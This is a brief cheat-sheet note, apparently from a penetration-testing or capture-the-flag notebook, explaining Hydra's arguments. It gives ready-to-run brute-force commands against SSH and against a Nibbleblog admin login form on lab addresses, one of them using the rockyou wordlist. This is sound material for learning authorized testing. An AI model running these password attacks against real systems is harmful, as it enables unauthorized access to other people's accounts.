# Hydra

Args:
* -L <usernamelist\>
* -P <passwordlist\>
* -p <one only password\>
* -l <one only username\>
* service://server:port
* http-post-form '/path.php:field(^USER^,^PASS^):F=error message'
```bash
#ssh with dictionary
hydra -L users.txt -P pass.txt ssh://10.10.10.7
```

The web form have a particular composition:
* ip by himself
* method and his argument have to be built as follow: 
```txt
	- the webpage path: '/nibbleblog/admin.php' 
	- the field to sent user field: username=^USER^ password field as ^PASS^
	- Failure message: F=message
#the 3 field have to be : separated
#'/admin.php:user=^USER^&passw=^PASS^:F=Incorrect username or password' 
```

```bash
#webform with dictionary and static username
hydra -l admin -P /opt/wordlists/rockyou.txt -v 10.10.10.75 http-post-form '/nibbleblog/admin.php:username=^USER^&password=^PASS^:F=Incorrect username or password' 
```

#tools #windows #linux #bruteforce #creds